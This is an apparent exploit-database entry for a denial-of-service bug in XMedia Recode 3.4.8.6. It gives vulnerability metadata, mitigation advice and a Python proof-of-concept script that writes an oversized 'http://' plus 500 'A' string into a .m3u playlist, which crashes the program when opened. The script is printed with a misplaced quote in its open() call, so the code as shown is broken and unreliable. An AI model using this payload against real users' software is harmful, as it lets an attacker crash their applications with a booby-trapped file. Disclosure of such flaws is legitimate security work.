XMedia Recode 3.4.8.6 - '.m3u' Denial Of Service

vendor:

XMedia Recode

by:

ZwX

7.5

CVSS

HIGH

Denial of Service

400

CWE

Product Name: XMedia Recode

Affected Version From: 3.4.8.6

Affected Version To: 3.4.8.6

Patch Exists: NO

Related CWE: N/A

CPE: a:xmedia_recode:xmedia_recode

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 7

2019

XMedia Recode 3.4.8.6 – ‘.m3u’ Denial Of Service

XMedia Recode is vulnerable to a denial of service attack when a maliciously crafted .m3u file is opened. This causes the application to crash. An attacker can exploit this vulnerability by convincing a user to open a maliciously crafted .m3u file.

Mitigation:

Users should avoid opening files from untrusted sources. Additionally, administrators should ensure that the latest version of XMedia Recode is installed.

Source

Exploit-DB raw data:

#Exploit Title: XMedia Recode 3.4.8.6 - '.m3u' Denial Of Service
#Exploit Author : ZwX
#Exploit Date: 2019-11-18
#Vendor Homepage : https://www.xmedia-recode.de/
#Link Software : https://www.xmedia-recode.de/download.php
#Tested on OS: Windows 7
#Social: twitter.com/ZwX2a
#contact: msk4@live.fr

'''
Proof of Concept (PoC):
=======================

1.Download and install XMedia Recode 
2.Run the python operating script that will create a file (poc.m3u)
3.Run the software "File -> Open File -> Add the file (.m3u) "
4.XMedia Recode Crashed
'''

#!/usr/bin/python

http = "http://" 
buffer = "\x41" * 500 

poc = http + buffer
file = open("poc.m3u,"w")
file.write(poc)
file.close()

print "POC Created by ZwX"